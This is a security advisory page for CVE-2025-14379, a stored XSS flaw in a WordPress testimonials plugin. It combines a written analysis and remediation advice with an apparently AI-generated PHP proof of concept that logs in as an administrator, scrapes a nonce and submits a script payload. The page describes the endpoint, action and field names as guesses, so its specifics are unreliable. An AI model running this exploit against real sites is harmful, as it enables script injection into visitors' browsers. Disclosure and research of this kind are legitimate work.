Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14379: Testimonials Creator 1.6 – Authenticated (Admin+) Stored Cross-Site Scripting (testimonials-creator)

Severity Medium (CVSS 4.4)
CWE 79
Vulnerable Version 1.6
Patched Version
Disclosed January 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14379 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Testimonials Creator WordPress plugin version 1.6. The issue resides in the plugin’s admin settings functionality, allowing attackers with administrator-level permissions or higher to inject arbitrary JavaScript. The vulnerability is only exploitable on WordPress multisite installations or on single-site installations where the `unfiltered_html` capability is disabled, which restricts the default sanitization performed by WordPress.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping, as classified under CWE-79. The vulnerability description confirms a lack of proper neutralization for user input within admin settings. Without access to source code, it is inferred that a plugin settings page or AJAX handler accepts administrator input, stores it in the database, and later outputs it without adequate escaping functions like `esc_html()` or `wp_kses()`. This conclusion is based on the CWE classification and the specific mention of admin settings as the attack vector.

Exploitation requires an attacker to possess administrator privileges. The attacker would navigate to the vulnerable plugin settings page within the WordPress admin dashboard, likely at a path like `/wp-admin/admin.php?page=testimonials-creator`. They would then submit a crafted payload into a text-based form field, such as one for a testimonial setting, label, or configuration option. A typical payload would be `alert(document.domain)`. This script would be stored in the WordPress database and subsequently rendered without sanitization on public or admin pages, executing in the browsers of visiting users.

Remediation requires implementing proper input validation and output escaping. The plugin developers should sanitize all user input on the server-side using functions like `sanitize_text_field()` before storage. For output, they must escape dynamic content with context-appropriate functions such as `esc_html()`, `esc_attr()`, or `wp_kses_post()`. A patch would also involve a capability check to ensure only users with the `unfiltered_html` capability can submit raw HTML, aligning with WordPress core security practices.

The impact of successful exploitation is client-side code execution within the context of the affected WordPress site. An attacker can perform actions as the victim user, including stealing session cookies, performing administrative actions on their behalf, or redirecting users to malicious sites. The CVSS score of 4.4 (Medium) reflects the high attack complexity (AC:H) and privileged requirements (PR:H), but the scope change (S:C) indicates the compromise can affect users beyond the targeted component.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14379 - Testimonials Creator 1.6 - Authenticated (Admin+) Stored Cross-Site Scripting
<?php
/*
 * Proof of Concept for CVE-2025-14379.
 * This script simulates an authenticated administrator exploiting the Stored XSS vulnerability
 * via the plugin's admin settings. The exact endpoint and parameter are inferred from common
 * WordPress plugin patterns and the vulnerability description.
 * Assumptions:
 * 1. The target has the Testimonials Creator plugin v1.6 installed.
 * 2. The attacker has valid administrator credentials.
 * 3. The site is a multisite installation or has `unfiltered_html` disabled.
 * 4. The vulnerable settings page is accessible via the standard WordPress admin menu.
 */

$target_url = 'http://vulnerable-site.com';
$username = 'admin';
$password = 'password';

// Initialize cURL session for cookie persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
$response = curl_exec($ch);

// Step 2: Access the plugin's settings page to obtain a nonce.
// The settings page slug is inferred from the plugin name.
$settings_url = $target_url . '/wp-admin/admin.php?page=testimonials-creator';
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Step 3: Extract a nonce from the settings page form.
// This regex looks for a common nonce field pattern. The actual nonce name may vary.
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $response, $nonce_matches);
$nonce = $nonce_matches[1] ?? '';

if (empty($nonce)) {
    die('Could not extract nonce. The page structure may differ.');
}

// Step 4: Submit the XSS payload to the settings update handler.
// The update action is assumed to be via admin-post.php or a similar endpoint.
$exploit_url = $target_url . '/wp-admin/admin-post.php';
// The payload is a simple script alert. In a real attack, this could be a credential stealer.
$xss_payload = '<script>alert("Atomic Edge XSS Test: "+document.domain)</script>';

$exploit_fields = [
    'action' => 'update_testimonials_creator_settings', // Inferred action name
    '_wpnonce' => $nonce,
    'testimonials_creator_setting_field' => $xss_payload // Injected into a vulnerable field
];

curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));
$response = curl_exec($ch);

// Step 5: Verify the payload was stored by visiting a page where the setting is output.
// This could be a frontend testimonial display or the settings page itself.
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

if (strpos($response, $xss_payload) !== false) {
    echo "SUCCESS: XSS payload appears to be stored in the page source.n";
    echo "Visit the plugin's settings or frontend display to trigger execution.n";
} else {
    echo "Payload may not have been stored. The target endpoint or parameters may differ.n";
}

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School